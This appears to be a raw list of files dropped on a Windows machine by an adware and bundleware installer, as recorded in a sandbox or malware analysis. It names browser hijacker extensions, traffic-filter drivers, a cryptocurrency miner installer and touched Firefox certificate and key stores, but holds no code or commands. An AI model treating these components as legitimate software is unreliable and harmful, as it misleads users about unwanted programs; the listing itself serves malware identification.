C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)
%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[2] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[2] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\verificar_ip[1].htm (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] (61315 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe (2736 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe (18984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe (45524 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe (64441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] (61024 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmD143.tmp (3145 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe (64732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe (64846 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe (34340 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe (33323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe (32080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe (127352 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] (42448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe (20815 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe (7390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe (61429 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe (5984 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe (31080 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe (119929 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2KY9FDOQT8H9H3WIW6VT.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LCWG3ST52CQ8BWKM1ZUM.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\749D80PVBSBBMHTBLUY1.temp (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhED6B.tmp (112516 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\awhEA2F.tmp (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe (872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\checks.txt (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\amisid.exe (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\cpuminer-x11opt-setup.exe (151433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\post_reply.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\inetc.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B7.tmp (3040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll (812 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe (142739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\nsisos.dll (13 bytes)
%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (18514 bytes)
%Program Files% (x86)\XTab\conf (1626 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1031.xpi (15 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\ver.txt (47 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15928 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tCE1709AA862C234DD936mp.tmp (144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\2[1].zip (213534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\one.zip (29636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\two.zip (74342 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\1[1].zip (178958 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\535559167_198339_B48A115F[1].htm (72 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowser.exe (5199 bytes)
%Program Files% (x86)\GOSafer\gosafer.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\GOSafer\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\GOSafer\nfapi.dll (4992 bytes)
%Program Files% (x86)\GOSafer\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\GOSafer\gosaferdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmF596.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\gosaferdrv.sys (51 bytes)
%Program Files% (x86)\GOSafer\uninst.exe (1793 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssF4BB.tmp (67374 bytes)
%Program Files% (x86)\GOSafer\ProtocolFilters.dll (9320 bytes)
%Program Files% (x86)\GOSafer\libeay32.dll (35507 bytes)
%Program Files% (x86)\CashReminder\nfapi.dll (118 bytes)
%Program Files% (x86)\CashReminder\ProtocolFilters.dll (249 bytes)
C:\Windows\Temp\P_StoreList.txt (784 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[2].txt (265 bytes)
C:\Windows\Temp\CashReminder\mfs162E.tmp (3516 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\stores[1].htm (784 bytes)
C:\Windows\Temp\CashReminder\mfs310F.tmp (229227 bytes)
%Program Files% (x86)\CashReminder\libeay32.dll (35507 bytes)
C:\Windows\System32\drivers\crfilterdrv.sys (51 bytes)
%Program Files% (x86)\CashReminder\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscDFF3.tmp (66830 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\CashReminder\CashReminder.exe (15982 bytes)
%Program Files% (x86)\CashReminder\uninstall.exe (1568 bytes)
%Program Files% (x86)\CashReminder\ssleay32.dll (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE0AF.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\CashReminder\crfilterdrv.sys (1856 bytes)
C:\Windows\Temp\ActSys\SSL\NJax Intermediate.cer (774 bytes)
C:\Windows\Temp\ActSys\SSL\cert.db (2 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[4].txt (197 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\cert8.db (7444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\key3.db (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\NSISEncrypt.dll (3323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsJSON.dll (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\lm (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\WmiInspector.dll (3137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\IpConfig.dll (4254 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\tlg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Plain Savings\mj (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshE4A4.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amipixel.cfg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\index[1].htm (1199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe:typelib (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amitest.txt (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\amipb[1].js (21314 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[3].txt (16 bytes)
C:\Windows\Temp\G_RuleList.txt (16 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[1].txt (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\button-bg.png (131 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\ProgressBar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo_new[1].png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\bootstrap_42881.html (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\button.css (417 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\declineBG[1].png (461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Yes_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ICReinstall_310714_is.exe (1380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg2.png (978 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\No_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\Rerarapepe_b[1].png (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Yes_Button_Hover[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
